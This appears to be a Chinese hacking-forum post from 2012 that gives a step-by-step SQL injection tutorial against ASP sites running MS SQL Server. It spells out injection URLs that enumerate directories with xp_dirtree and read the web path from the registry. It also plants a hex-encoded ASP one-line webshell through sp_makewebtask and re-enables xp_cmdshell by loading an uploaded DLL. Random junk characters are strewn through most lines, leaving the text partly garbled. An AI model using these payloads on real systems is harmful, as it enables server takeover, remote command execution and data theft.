好,我们exec master..xp_dirtree'd:/test'
3 a3 E( g/ _; v' Q假设我们在test里有两个文件夹test1和test2在test1里又有test3
1 T: ^! ?$ G& [0 k7 f5 q9 U& @结果显示9 ?8 A' r7 f- x
5 A9 ~( b: Z9 U" h- fsubdirectory depth; S' H! c% ~( v2 J' j
test1 1$ M0 K0 c" F) ^* l2 ~, l7 r
test3 2$ j. o1 f( h: x7 Z3 E
test2 1( t5 O {8 C" m! u1 L0 N
; i; w; K8 D/ C6 W8 F哈哈发现没有那个depth就是目录的级数1 t% k$ `' i: b8 L
ok了,知道怎么办了吧
6 G) a' N& \, V6 a
+ p8 ~1 ]. u5 A% Z6 _ khttp://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)-- * F! P5 ?* y% U# W! A x
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
: [6 g$ v* l1 I8 q, r6 B6 }" O; p. H5 Whttp://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-& |+ H- u; s5 M# N
1 b( x) e3 z- J4 V- m( L只要加上id=1,就是第一级目录 。5 \: V: T- [& j9 y' l0 Z) G
- v& P; ^7 g. T; b- }+ i: s' L# l( B2 J0 O3 D; x: |
通过注册表读网站路径:
% s6 ~; e9 G: V0 a
6 R' l, t+ i: J) r1.;create table [dbo].[cyfd] ([gyfd][char](255));4 `) w# t# i: P z) s, i+ N/ |
2 J" G. o- J6 c. y3 m2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--/ O+ O5 t3 `8 P3 V: p
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--2 z1 C; S8 ]& y2 a$ x! S
9 V5 X6 C. ]- }/ ~+ e4 f
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
0 I! R! o- z( V2 J, ^1 v+ M0 _- ]and 1=(select count(*) from cyfd where gyfd > 1)
2 ?. F1 H: E5 K( q0 E* r这样IE报错,就把刚才插进去的Web路径的值报出来了$ V" K' f9 H; S/ i, O' W8 Y
4 ^( e3 Z& w- i' i. R3 z
4.drop table cyfd;-- 删除临时表. u) N+ }$ P3 Q! N" Y5 h
# L0 `3 N" E m0 `' _1 ~9 D6 k
获得webshell方法:) N+ Z5 ~3 i! ?. x+ t
1.create table cmd (a image)-- \**cmd是创建的临时表' {+ `+ s7 n( ^/ V$ ?1 X
( Y! l2 W, O2 o: R4 s2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话, e/ V. q- E( A/ D! r
' v& j% s4 o2 \& M" K
! ~4 k( k. J" ?. j3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'0 |: H9 @8 c8 q- t
EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'! h+ { ]! p7 o6 h) q" x
% O9 O, S; b/ D$ Q! V/ u0 j: Q4.drop table cmd;-- 删除cmd临时表4 x9 M5 Z, X2 @ N/ [
; o+ X; D5 g; O. v2 U- a
恢复xp_cmdshell方法之一:2 _9 Y# z$ [' I* g" C4 m" U" a
我很快就把xplog70.dll文件给他上传到e:\inetpub\wwwroot目录下了,来吧,我们来给他恢复,提交:
* G' M, z8 X- x( R4 E' bhttp://www.something.com/script.asp?id=2;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetpub\wwwroot\xplog70.dll'
( E9 x+ c* a5 d P恢复,支持绝对路径的恢复哦。:)/ f% W+ O. F% N2 _6 K
|
发表于 2012-9-13 17:20:30
收藏
支持
反对